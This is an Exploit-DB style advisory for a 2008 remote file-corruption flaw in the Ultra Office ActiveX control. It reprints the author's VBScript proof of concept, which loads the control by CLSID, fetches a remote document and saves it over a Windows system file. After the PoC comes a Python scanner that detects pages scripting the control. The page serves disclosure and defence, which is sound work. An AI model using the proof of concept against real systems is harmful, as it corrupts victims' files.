vendor: Ultra Office ActiveX Control
by: shinnai
CVSS: 9.3 HIGH
Remote Arbitrary File Corruption
CWE: 20
Product Name: Ultra Office ActiveX Control
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Platforms Tested: Windows XP Professional SP3
2008

Ultra Office ActiveX Control Remote Arbitrary File Corruption

A vulnerability in Ultra Office ActiveX Control allows remote attackers to corrupt arbitrary files on the vulnerable system. The control does not properly validate user-supplied input passed to its Open and Save methods. An attacker can exploit this by enticing a victim to click a malicious link or visit a malicious website, which causes the vulnerable ActiveX control to open a malicious file and save it on the victim's system.

Mitigation:

Upgrade to the latest version of Ultra Office ActiveX Control or apply the vendor-supplied patch.

Exploit-DB raw data:

-----------------------------------------------------------------------------
 Ultra Office ActiveX Control Remote Arbitrary File Corruption
 url: http://www.ultrashareware.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purposes. Use it at your own risk.
 Author will not be responsible for any damage.

 Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:00989888-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
    dim remURL
    remURL = "http://SomeSite.com/SomeFile.doc"
    test.Open remURL, True
    test.Save "C:\WINDOWS\_system.ini", True
  End Sub
</script>

# milw0rm.com [2008-08-27]
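
One way to flag HTML that loads this control and scripts its Open or Save methods, for a web proxy or mail gateway content check (an added example, not part of the original advisory or the author's code). The CLSID comes from the proof of concept above; `scan_html`, `ControlUseFinder` and the sample markup are names and input constructed for this example.

```python
import re
from html.parser import HTMLParser

# CLSID copied from the <object> tag in the proof of concept on this page.
ULTRA_OFFICE_CLSID = "00989888-BB72-4E31-A7C6-5F819C24D2F7"

# Constructed sample input (not captured traffic); id, URL and path are placeholders.
SAMPLE = """<object classid="CLSID:00989888-bb72-4e31-a7c6-5f819c24d2f7" id=ctl></object>
<script language="vbscript">
  ctl.open "http://example.invalid/a.doc", True
  ctl.Save "C:\\Temp\\out.doc", True
</script>"""


class ControlUseFinder(HTMLParser):
    """Collects ids of <object> tags that load the control, and all script text."""

    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "object":
            # classid values are case-insensitive, so normalise before comparing.
            classid = (attrs.get("classid") or "").strip().upper()
            if classid == "CLSID:" + ULTRA_OFFICE_CLSID:
                self.object_ids.append(attrs.get("id") or "")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_html(html):
    """Return (loads_control, sorted Open/Save methods called on the control)."""
    finder = ControlUseFinder()
    finder.feed(html)
    finder.close()
    script_text, calls = "\n".join(finder.scripts), set()
    for obj_id in filter(None, finder.object_ids):
        # VBScript is case-insensitive, so match the id and method in any case.
        pattern = re.compile(r"\b%s\s*\.\s*(open|save)\b" % re.escape(obj_id), re.I)
        calls.update(m.group(1).capitalize() for m in pattern.finditer(script_text))
    return bool(finder.object_ids), sorted(calls)
```

A page that instantiates the control without scripting it still returns `True` in the first field, so the check can alert on the control's presence alone and treat Open or Save calls as a higher-severity signal.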